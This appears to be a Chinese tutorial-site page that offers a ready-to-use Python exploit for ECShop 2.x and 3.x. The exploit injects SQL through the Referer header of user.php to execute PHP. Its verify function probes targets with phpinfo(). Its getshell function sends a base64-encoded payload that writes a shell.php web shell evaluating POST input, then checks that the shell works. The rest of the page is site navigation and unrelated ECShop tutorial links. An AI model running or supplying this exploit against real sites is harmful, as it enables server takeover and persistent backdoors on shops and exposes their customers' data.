您现在的位置是:首页 > 教程 > ecshop商城教程ecshop商城教程
ecshop v2 v3 EXP使用方法代码示例
灵槐2024-12-26 10:53:54ecshop商城教程已有人查阅
导读大概就是这么个样子,具体要怎么用自己在添加主函数就行。
import requests
import binascii
def get_v2Payload(code):
'''Ecshop V2.x payload'''
code = "{$abc'];@assert(%s);//}" %(code)
# print(code)
code = code.encode()
shellcode = binascii.hexlify(code).decode()
payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)),shellcode)
return payload
def get_v3Payload(code):
'''Ecshop V3.x payload'''
code = "{$abc'];assert(%s);//}" %(code)
code = code.encode()
shellcode = binascii.hexlify(code).decode()
payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)),shellcode)
return payload
def verify(url):
print(url)
flag = "allow_url_include"
code = "phpinfo()"
url = url + "/user.php"
ec2payload = get_v2Payload(code)
# print(ec2payload)
ec3payload = get_v3Payload(code)
payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
for payload,version in payloads:
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
'Referer':payload
}
try:
rsp = requests.get(url,headers=headers,timeout=3)
if flag in rsp.text:
verifyInfo = {}
verifyInfo['URL'] = url
verifyInfo['version'] = version
print(verifyInfo)
break
except:
pass
def getshell(url):
code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
i = url + "/user.php"
ec2payload = get_v2Payload(code)
# print(ec2payload)
ec3payload = get_v3Payload(code)
payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
for payload,version in payloads:
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
'Referer':payload
}
try:
rsp = requests.get(i,headers=headers,timeout=5)
if rsp.status_code == 200:
shurl = url + "/shell.php"
srsp = requests.get(shurl,timeout=5)
if srsp.status_code == 200:
verifyInfo = {}
verifyInfo['URL'] = shurl
verifyInfo['version'] = version
print(verifyInfo)
break
except:
pass
大概就是这么个样子,具体要怎么用自己在添加主函数就行。
本文标签:
很赞哦! ()
下一篇:ecshop目录结构文件说明
相关文章
随机图文
ecshop增加独立评论页面分页显示的实现方法
ecshop使用一个单独的页面来显示所有的评论,并在评论中显示会员 评论的商品 评论内容等。首先建立三个文件,testp.php test.dwt test.lbi,test.php 就是最终的评论页面。
ecshop首页商品水印best,hot,new怎么删除
注意:此教程只对ECSHOP默认模板有效,其他模板也许根本就没这几个水印1)、打开 /themes/default/library/recommend_best.lbi 文件
ecshop商品批量上传和商品数据包导入的操作方法
今天为大家详细解说一下ECSHOP商品批量上传,ECSHOP商品数据导入设置。1.1 进入后台管理中心 商品管理-〉商品批量上传,进入商品批量上传页面。
ecshop商品搜索页title商品搜索文字怎么删除
去掉ecshop搜索页Title里的“商品搜索”四个字的方法:修改 search.php 文件
| 留言与评论 (共有 条评论) |
